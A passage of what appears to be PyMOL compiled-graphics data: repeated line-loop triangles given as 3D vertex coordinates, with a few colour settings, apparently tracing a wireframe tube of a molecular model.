VERTEX, 24.779, 34.292, 30.038,
VERTEX, 25.213, 34.314, 30.170,
VERTEX, 24.839, 34.480, 29.399,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.213, 34.314, 30.170,
VERTEX, 24.839, 34.480, 29.399,
VERTEX, 25.278, 34.518, 29.536,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.839, 34.480, 29.399,
VERTEX, 25.278, 34.518, 29.536,
VERTEX, 24.883, 34.942, 28.606,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.278, 34.518, 29.536,
VERTEX, 24.883, 34.942, 28.606,
VERTEX, 25.298, 34.994, 28.751,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.883, 34.942, 28.606,
VERTEX, 25.298, 34.994, 28.751,
VERTEX, 24.884, 35.407, 28.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.298, 34.994, 28.751,
VERTEX, 24.884, 35.407, 28.125,
VERTEX, 25.261, 35.463, 28.275,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.884, 35.407, 28.125,
VERTEX, 25.261, 35.463, 28.275,
VERTEX, 24.842, 35.603, 28.237,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.261, 35.463, 28.275,
VERTEX, 24.842, 35.603, 28.237,
VERTEX, 25.189, 35.650, 28.387,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.842, 35.603, 28.237,
VERTEX, 25.189, 35.650, 28.387,
VERTEX, 24.782, 35.415, 28.877,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.189, 35.650, 28.387,
VERTEX, 24.782, 35.415, 28.877,
VERTEX, 25.124, 35.446, 29.021,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.782, 35.415, 28.877,
VERTEX, 25.124, 35.446, 29.021,
VERTEX, 24.738, 34.953, 29.669,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.124, 35.446, 29.021,
VERTEX, 24.738, 34.953, 29.669,
VERTEX, 25.104, 34.970, 29.806,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.738, 34.953, 29.669,
VERTEX, 25.104, 34.970, 29.806,
VERTEX, 24.737, 34.488, 30.150,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.104, 34.970, 29.806,
VERTEX, 24.737, 34.488, 30.150,
VERTEX, 25.141, 34.501, 30.282,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.737, 34.488, 30.150,
VERTEX, 25.141, 34.501, 30.282,
VERTEX, 24.779, 34.292, 30.038,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.141, 34.501, 30.282,
VERTEX, 24.779, 34.292, 30.038,
VERTEX, 25.213, 34.314, 30.170,
END,
COLOR, 0.000, 0.984, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 25.213, 34.314, 30.170,
VERTEX, 25.634, 34.389, 30.328,
VERTEX, 25.278, 34.518, 29.536,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.634, 34.389, 30.328,
VERTEX, 25.278, 34.518, 29.536,
VERTEX, 25.701, 34.608, 29.699,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.278, 34.518, 29.536,
VERTEX, 25.701, 34.608, 29.699,
VERTEX, 25.298, 34.994, 28.751,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.701, 34.608, 29.699,
VERTEX, 25.298, 34.994, 28.751,
VERTEX, 25.694, 35.092, 28.919,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.298, 34.994, 28.751,
VERTEX, 25.694, 35.092, 28.919,
VERTEX, 25.261, 35.463, 28.275,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.694, 35.092, 28.919,
VERTEX, 25.261, 35.463, 28.275,
VERTEX, 25.617, 35.558, 28.444,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.261, 35.463, 28.275,
VERTEX, 25.617, 35.558, 28.444,
VERTEX, 25.189, 35.650, 28.387,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.617, 35.558, 28.444,
VERTEX, 25.189, 35.650, 28.387,
VERTEX, 25.516, 35.733, 28.554,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.189, 35.650, 28.387,
VERTEX, 25.516, 35.733, 28.554,
VERTEX, 25.124, 35.446, 29.021,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.516, 35.733, 28.554,
VERTEX, 25.124, 35.446, 29.021,
VERTEX, 25.449, 35.514, 29.183,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.124, 35.446, 29.021,
VERTEX, 25.449, 35.514, 29.183,
VERTEX, 25.104, 34.970, 29.806,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.449, 35.514, 29.183,
VERTEX, 25.104, 34.970, 29.806,
VERTEX, 25.456, 35.029, 29.963,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.104, 34.970, 29.806,
VERTEX, 25.456, 35.029, 29.963,
VERTEX, 25.141, 34.501, 30.282,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.456, 35.029, 29.963,
VERTEX, 25.141, 34.501, 30.282,
VERTEX, 25.533, 34.563, 30.437,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.141, 34.501, 30.282,
VERTEX, 25.533, 34.563, 30.437,
VERTEX, 25.213, 34.314, 30.170,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.533, 34.563, 30.437,
VERTEX, 25.213, 34.314, 30.170,
VERTEX, 25.634, 34.389, 30.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.634, 34.389, 30.328,
VERTEX, 26.027, 34.506, 30.520,
VERTEX, 25.701, 34.608, 29.699,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.027, 34.506, 30.520,
VERTEX, 25.701, 34.608, 29.699,
VERTEX, 26.094, 34.741, 29.897,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.701, 34.608, 29.699,
VERTEX, 26.094, 34.741, 29.897,
VERTEX, 25.694, 35.092, 28.919,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.094, 34.741, 29.897,
VERTEX, 25.694, 35.092, 28.919,
VERTEX, 26.059, 35.229, 29.120,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.694, 35.092, 28.919,
VERTEX, 26.059, 35.229, 29.120,
VERTEX, 25.617, 35.558, 28.444,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.059, 35.229, 29.120,
VERTEX, 25.617, 35.558, 28.444,
VERTEX, 25.941, 35.685, 28.644,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.617, 35.558, 28.444,
VERTEX, 25.941, 35.685, 28.644,
VERTEX, 25.516, 35.733, 28.554,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.941, 35.685, 28.644,
VERTEX, 25.516, 35.733, 28.554,
VERTEX, 25.810, 35.842, 28.749,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.516, 35.733, 28.554,
VERTEX, 25.810, 35.842, 28.749,
VERTEX, 25.449, 35.514, 29.183,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.810, 35.842, 28.749,
VERTEX, 25.449, 35.514, 29.183,
VERTEX, 25.742, 35.607, 29.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.449, 35.514, 29.183,
VERTEX, 25.742, 35.607, 29.372,
VERTEX, 25.456, 35.029, 29.963,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.742, 35.607, 29.372,
VERTEX, 25.456, 35.029, 29.963,
VERTEX, 25.778, 35.119, 30.149,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.456, 35.029, 29.963,
VERTEX, 25.778, 35.119, 30.149,
VERTEX, 25.533, 34.563, 30.437,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.778, 35.119, 30.149,
VERTEX, 25.533, 34.563, 30.437,
VERTEX, 25.895, 34.663, 30.625,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.533, 34.563, 30.437,
VERTEX, 25.895, 34.663, 30.625,
VERTEX, 25.634, 34.389, 30.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.895, 34.663, 30.625,
VERTEX, 25.634, 34.389, 30.328,
VERTEX, 26.027, 34.506, 30.520,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.027, 34.506, 30.520,
VERTEX, 26.376, 34.657, 30.758,
VERTEX, 26.094, 34.741, 29.897,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.376, 34.657, 30.758,
VERTEX, 26.094, 34.741, 29.897,
VERTEX, 26.446, 34.909, 30.142,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.094, 34.741, 29.897,
VERTEX, 26.446, 34.909, 30.142,
VERTEX, 26.059, 35.229, 29.120,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.446, 34.909, 30.142,
VERTEX, 26.059, 35.229, 29.120,
VERTEX, 26.382, 35.396, 29.366,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.059, 35.229, 29.120,
VERTEX, 26.382, 35.396, 29.366,
VERTEX, 25.941, 35.685, 28.644,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.382, 35.396, 29.366,
VERTEX, 25.941, 35.685, 28.644,
VERTEX, 26.221, 35.834, 28.885,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.941, 35.685, 28.644,
VERTEX, 26.221, 35.834, 28.885,
VERTEX, 25.810, 35.842, 28.749,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.221, 35.834, 28.885,
VERTEX, 25.810, 35.842, 28.749,
VERTEX, 26.059, 35.965, 28.981,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.810, 35.842, 28.749,
VERTEX, 26.059, 35.965, 28.981,
VERTEX, 25.742, 35.607, 29.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.059, 35.965, 28.981,
VERTEX, 25.742, 35.607, 29.372,
VERTEX, 25.989, 35.713, 29.597,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.742, 35.607, 29.372,
VERTEX, 25.989, 35.713, 29.597,
VERTEX, 25.778, 35.119, 30.149,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.989, 35.713, 29.597,
VERTEX, 25.778, 35.119, 30.149,
VERTEX, 26.053, 35.225, 30.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.778, 35.119, 30.149,
VERTEX, 26.053, 35.225, 30.373,
VERTEX, 25.895, 34.663, 30.625,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.053, 35.225, 30.373,
VERTEX, 25.895, 34.663, 30.625,
VERTEX, 26.214, 34.788, 30.854,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.895, 34.663, 30.625,
VERTEX, 26.214, 34.788, 30.854,
VERTEX, 26.027, 34.506, 30.520,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.214, 34.788, 30.854,
VERTEX, 26.027, 34.506, 30.520,
VERTEX, 26.376, 34.657, 30.758,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.376, 34.657, 30.758,
VERTEX, 26.666, 34.833, 31.052,
VERTEX, 26.446, 34.909, 30.142,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.666, 34.833, 31.052,
VERTEX, 26.446, 34.909, 30.142,
VERTEX, 26.739, 35.108, 30.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.446, 34.909, 30.142,
VERTEX, 26.739, 35.108, 30.446,
VERTEX, 26.382, 35.396, 29.366,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.739, 35.108, 30.446,
VERTEX, 26.382, 35.396, 29.366,
VERTEX, 26.647, 35.591, 29.670,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.382, 35.396, 29.366,
VERTEX, 26.647, 35.591, 29.670,
VERTEX, 26.221, 35.834, 28.885,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.647, 35.591, 29.670,
VERTEX, 26.221, 35.834, 28.885,
VERTEX, 26.446, 35.998, 29.179,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.221, 35.834, 28.885,
VERTEX, 26.446, 35.998, 29.179,
VERTEX, 26.059, 35.965, 28.981,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.446, 35.998, 29.179,
VERTEX, 26.059, 35.965, 28.981,
VERTEX, 26.252, 36.091, 29.259,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.059, 35.965, 28.981,
VERTEX, 26.252, 36.091, 29.259,
VERTEX, 25.989, 35.713, 29.597,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.252, 36.091, 29.259,
VERTEX, 25.989, 35.713, 29.597,
VERTEX, 26.179, 35.815, 29.865,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.989, 35.713, 29.597,
VERTEX, 26.179, 35.815, 29.865,
VERTEX, 26.053, 35.225, 30.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.179, 35.815, 29.865,
VERTEX, 26.053, 35.225, 30.373,
VERTEX, 26.271, 35.333, 30.641,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.053, 35.225, 30.373,
VERTEX, 26.271, 35.333, 30.641,
VERTEX, 26.214, 34.788, 30.854,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.271, 35.333, 30.641,
VERTEX, 26.214, 34.788, 30.854,
VERTEX, 26.472, 34.926, 31.133,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.214, 34.788, 30.854,
VERTEX, 26.472, 34.926, 31.133,
VERTEX, 26.376, 34.657, 30.758,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.472, 34.926, 31.133,
VERTEX, 26.376, 34.657, 30.758,
VERTEX, 26.666, 34.833, 31.052,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.666, 34.833, 31.052,
VERTEX, 26.877, 35.021, 31.412,
VERTEX, 26.739, 35.108, 30.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.877, 35.021, 31.412,
VERTEX, 26.739, 35.108, 30.446,
VERTEX, 26.950, 35.327, 30.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.739, 35.108, 30.446,
VERTEX, 26.950, 35.327, 30.821,
VERTEX, 26.647, 35.591, 29.670,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.950, 35.327, 30.821,
VERTEX, 26.647, 35.591, 29.670,
VERTEX, 26.834, 35.802, 30.044,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.647, 35.591, 29.670,
VERTEX, 26.834, 35.802, 30.044,
VERTEX, 26.446, 35.998, 29.179,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.834, 35.802, 30.044,
VERTEX, 26.446, 35.998, 29.179,
VERTEX, 26.598, 36.168, 29.535,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.446, 35.998, 29.179,
VERTEX, 26.598, 36.168, 29.535,
VERTEX, 26.252, 36.091, 29.259,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.598, 36.168, 29.535,
VERTEX, 26.252, 36.091, 29.259,
VERTEX, 26.381, 36.211, 29.594,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.252, 36.091, 29.259,
VERTEX, 26.381, 36.211, 29.594,
VERTEX, 26.179, 35.815, 29.865,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.381, 36.211, 29.594,
VERTEX, 26.179, 35.815, 29.865,
VERTEX, 26.308, 35.905, 30.185,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.179, 35.815, 29.865,
VERTEX, 26.308, 35.905, 30.185,
VERTEX, 26.271, 35.333, 30.641,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.308, 35.905, 30.185,
VERTEX, 26.271, 35.333, 30.641,
VERTEX, 26.424, 35.430, 30.962,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.271, 35.333, 30.641,
VERTEX, 26.424, 35.430, 30.962,
VERTEX, 26.472, 34.926, 31.133,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.424, 35.430, 30.962,
VERTEX, 26.472, 34.926, 31.133,
VERTEX, 26.660, 35.064, 31.471,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.472, 34.926, 31.133,
VERTEX, 26.660, 35.064, 31.471,
VERTEX, 26.666, 34.833, 31.052,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.660, 35.064, 31.471,
VERTEX, 26.666, 34.833, 31.052,
VERTEX, 26.877, 35.021, 31.412,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.877, 35.021, 31.412,
VERTEX, 26.995, 35.245, 31.792,
VERTEX, 26.950, 35.327, 30.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.995, 35.245, 31.792,
VERTEX, 26.950, 35.327, 30.821,
VERTEX, 27.057, 35.578, 31.214,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.950, 35.327, 30.821,
VERTEX, 27.057, 35.578, 31.214,
VERTEX, 26.834, 35.802, 30.044,
END,
BEGIN, LINE_LOOP,
VERTEX, 27.057, 35.578, 31.214,
VERTEX, 26.834, 35.802, 30.044,
VERTEX, 26.919, 36.040, 30.433,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.834, 35.802, 30.044,
VERTEX, 26.919, 36.040, 30.433,
VERTEX, 26.598, 36.168, 29.535,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.919, 36.040, 30.433,
VERTEX, 26.598, 36.168, 29.535,
VERTEX, 26.661, 36.360, 29.905,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.598, 36.168, 29.535,
VERTEX, 26.661, 36.360, 29.905,
VERTEX, 26.381, 36.211, 29.594,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.661, 36.360, 29.905,
VERTEX, 26.381, 36.211, 29.594,
VERTEX, 26.434, 36.352, 29.940,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.381, 36.211, 29.594,
VERTEX, 26.434, 36.352, 29.940,
VERTEX, 26.308, 35.905, 30.185,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.434, 36.352, 29.940,
VERTEX, 26.308, 35.905, 30.185,
VERTEX, 26.372, 36.019, 30.517,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.308, 35.905, 30.185,
VERTEX, 26.372, 36.019, 30.517,
VERTEX, 26.424, 35.430, 30.962,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.372, 36.019, 30.517,
VERTEX, 26.424, 35.430, 30.962,
VERTEX, 26.510, 35.557, 31.299,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.424, 35.430, 30.962,
VERTEX, 26.510, 35.557, 31.299,
VERTEX, 26.660, 35.064, 31.471,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.510, 35.557, 31.299,
VERTEX, 26.660, 35.064, 31.471,
VERTEX, 26.768, 35.237, 31.827,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.660, 35.064, 31.471,
VERTEX, 26.768, 35.237, 31.827,
VERTEX, 26.877, 35.021, 31.412,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.768, 35.237, 31.827,
VERTEX, 26.877, 35.021, 31.412,
VERTEX, 26.995, 35.245, 31.792,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.995, 35.245, 31.792,
VERTEX, 27.025, 35.522, 32.141,
VERTEX, 27.057, 35.578, 31.214,
END,
BEGIN, LINE_LOOP,
VERTEX, 27.025, 35.522, 32.141,
VERTEX, 27.057, 35.578, 31.214,
VERTEX, 27.069, 35.869, 31.570,
END,
BEGIN, LINE_LOOP,
VERTEX, 27.057, 35.578, 31.214,
VERTEX, 27.069, 35.869, 31.570,
VERTEX, 26.919, 36.040, 30.433,
END,
BEGIN, LINE_LOOP,
VERTEX, 27.069, 35.869, 31.570,
VERTEX, 26.919, 36.040, 30.433,
VERTEX, 26.908, 36.310, 30.780,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.919, 36.040, 30.433,
VERTEX, 26.908, 36.310, 30.780,
VERTEX, 26.661, 36.360, 29.905,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.908, 36.310, 30.780,
VERTEX, 26.661, 36.360, 29.905,
VERTEX, 26.636, 36.585, 30.234,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.661, 36.360, 29.905,
VERTEX, 26.636, 36.585, 30.234,
VERTEX, 26.434, 36.352, 29.940,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.636, 36.585, 30.234,
VERTEX, 26.434, 36.352, 29.940,
VERTEX, 26.413, 36.534, 30.251,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.434, 36.352, 29.940,
VERTEX, 26.413, 36.534, 30.251,
VERTEX, 26.372, 36.019, 30.517,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.413, 36.534, 30.251,
VERTEX, 26.372, 36.019, 30.517,
VERTEX, 26.369, 36.187, 30.822,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.372, 36.019, 30.517,
VERTEX, 26.369, 36.187, 30.822,
VERTEX, 26.510, 35.557, 31.299,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.369, 36.187, 30.822,
VERTEX, 26.510, 35.557, 31.299,
VERTEX, 26.530, 35.747, 31.612,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.510, 35.557, 31.299,
VERTEX, 26.530, 35.747, 31.612,
VERTEX, 26.768, 35.237, 31.827,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.530, 35.747, 31.612,
VERTEX, 26.768, 35.237, 31.827,
VERTEX, 26.801, 35.472, 32.158,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.768, 35.237, 31.827,
VERTEX, 26.801, 35.472, 32.158,
VERTEX, 26.995, 35.245, 31.792,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.801, 35.472, 32.158,
VERTEX, 26.995, 35.245, 31.792,
VERTEX, 27.025, 35.522, 32.141,
END,
BEGIN, LINE_LOOP,
VERTEX, 27.025, 35.522, 32.141,
VERTEX, 26.977, 35.832, 32.463,
VERTEX, 27.069, 35.869, 31.570,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.977, 35.832, 32.463,
VERTEX, 27.069, 35.869, 31.570,
VERTEX, 26.999, 36.184, 31.894,
END,
BEGIN, LINE_LOOP,
VERTEX, 27.069, 35.869, 31.570,
VERTEX, 26.999, 36.184, 31.894,
VERTEX, 26.908, 36.310, 30.780,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.999, 36.184, 31.894,
VERTEX, 26.908, 36.310, 30.780,
VERTEX, 26.817, 36.596, 31.093,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.908, 36.310, 30.780,
VERTEX, 26.817, 36.596, 31.093,
VERTEX, 26.636, 36.585, 30.234,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.817, 36.596, 31.093,
VERTEX, 26.636, 36.585, 30.234,
VERTEX, 26.537, 36.827, 30.531,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.636, 36.585, 30.234,
VERTEX, 26.537, 36.827, 30.531,
VERTEX, 26.413, 36.534, 30.251,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.537, 36.827, 30.531,
VERTEX, 26.413, 36.534, 30.251,
VERTEX, 26.324, 36.742, 30.536,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.413, 36.534, 30.251,
VERTEX, 26.324, 36.742, 30.536,
VERTEX, 26.369, 36.187, 30.822,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.324, 36.742, 30.536,
VERTEX, 26.369, 36.187, 30.822,
VERTEX, 26.302, 36.391, 31.105,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.369, 36.187, 30.822,
VERTEX, 26.302, 36.391, 31.105,
VERTEX, 26.530, 35.747, 31.612,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.302, 36.391, 31.105,
VERTEX, 26.530, 35.747, 31.612,
VERTEX, 26.484, 35.979, 31.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.530, 35.747, 31.612,
VERTEX, 26.484, 35.979, 31.906,
VERTEX, 26.801, 35.472, 32.158,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.484, 35.979, 31.906,
VERTEX, 26.801, 35.472, 32.158,
VERTEX, 26.764, 35.747, 32.468,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.801, 35.472, 32.158,
VERTEX, 26.764, 35.747, 32.468,
VERTEX, 27.025, 35.522, 32.141,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.764, 35.747, 32.468,
VERTEX, 27.025, 35.522, 32.141,
VERTEX, 26.977, 35.832, 32.463,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.977, 35.832, 32.463,
VERTEX, 26.863, 36.156, 32.764,
VERTEX, 26.999, 36.184, 31.894,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.863, 36.156, 32.764,
VERTEX, 26.999, 36.184, 31.894,
VERTEX, 26.862, 36.504, 32.192,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.999, 36.184, 31.894,
VERTEX, 26.862, 36.504, 32.192,
VERTEX, 26.817, 36.596, 31.093,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.862, 36.504, 32.192,
VERTEX, 26.817, 36.596, 31.093,
VERTEX, 26.661, 36.884, 31.380,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.817, 36.596, 31.093,
VERTEX, 26.661, 36.884, 31.380,
VERTEX, 26.537, 36.827, 30.531,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.661, 36.884, 31.380,
VERTEX, 26.537, 36.827, 30.531,
VERTEX, 26.378, 37.072, 30.804,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.537, 36.827, 30.531,
VERTEX, 26.378, 37.072, 30.804,
VERTEX, 26.324, 36.742, 30.536,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.378, 37.072, 30.804,
VERTEX, 26.324, 36.742, 30.536,
VERTEX, 26.178, 36.958, 30.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.324, 36.742, 30.536,
VERTEX, 26.178, 36.958, 30.800,
VERTEX, 26.302, 36.391, 31.105,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.178, 36.958, 30.800,
VERTEX, 26.302, 36.391, 31.105,
VERTEX, 26.179, 36.610, 31.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.302, 36.391, 31.105,
VERTEX, 26.179, 36.610, 31.372,
VERTEX, 26.484, 35.979, 31.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.179, 36.610, 31.372,
VERTEX, 26.484, 35.979, 31.906,
VERTEX, 26.380, 36.230, 32.184,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.484, 35.979, 31.906,
VERTEX, 26.380, 36.230, 32.184,
VERTEX, 26.764, 35.747, 32.468,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.380, 36.230, 32.184,
VERTEX, 26.764, 35.747, 32.468,
VERTEX, 26.663, 36.042, 32.760,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.764, 35.747, 32.468,
VERTEX, 26.663, 36.042, 32.760,
VERTEX, 26.977, 35.832, 32.463,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.663, 36.042, 32.760,
VERTEX, 26.977, 35.832, 32.463,
VERTEX, 26.863, 36.156, 32.764,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.863, 36.156, 32.764,
VERTEX, 26.689, 36.472, 33.048,
VERTEX, 26.862, 36.504, 32.192,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.689, 36.472, 33.048,
VERTEX, 26.862, 36.504, 32.192,
VERTEX, 26.666, 36.814, 32.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.862, 36.504, 32.192,
VERTEX, 26.666, 36.814, 32.473,
VERTEX, 26.661, 36.884, 31.380,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.666, 36.814, 32.473,
VERTEX, 26.661, 36.884, 31.380,
VERTEX, 26.450, 37.159, 31.650,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.661, 36.884, 31.380,
VERTEX, 26.450, 37.159, 31.650,
VERTEX, 26.378, 37.072, 30.804,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.450, 37.159, 31.650,
VERTEX, 26.378, 37.072, 30.804,
VERTEX, 26.169, 37.304, 31.060,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.378, 37.072, 30.804,
VERTEX, 26.169, 37.304, 31.060,
VERTEX, 26.178, 36.958, 30.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.169, 37.304, 31.060,
VERTEX, 26.178, 36.958, 30.800,
VERTEX, 25.986, 37.165, 31.050,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.178, 36.958, 30.800,
VERTEX, 25.986, 37.165, 31.050,
VERTEX, 26.179, 36.610, 31.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.986, 37.165, 31.050,
VERTEX, 26.179, 36.610, 31.372,
VERTEX, 26.010, 36.823, 31.625,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.179, 36.610, 31.372,
VERTEX, 26.010, 36.823, 31.625,
VERTEX, 26.380, 36.230, 32.184,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.010, 36.823, 31.625,
VERTEX, 26.380, 36.230, 32.184,
VERTEX, 26.225, 36.479, 32.448,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.380, 36.230, 32.184,
VERTEX, 26.225, 36.479, 32.448,
VERTEX, 26.663, 36.042, 32.760,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.225, 36.479, 32.448,
VERTEX, 26.663, 36.042, 32.760,
VERTEX, 26.507, 36.333, 33.038,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.663, 36.042, 32.760,
VERTEX, 26.507, 36.333, 33.038,
VERTEX, 26.863, 36.156, 32.764,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.507, 36.333, 33.038,
VERTEX, 26.863, 36.156, 32.764,
VERTEX, 26.689, 36.472, 33.048,
END,
COLOR, 0.000, 1.000, 0.992,
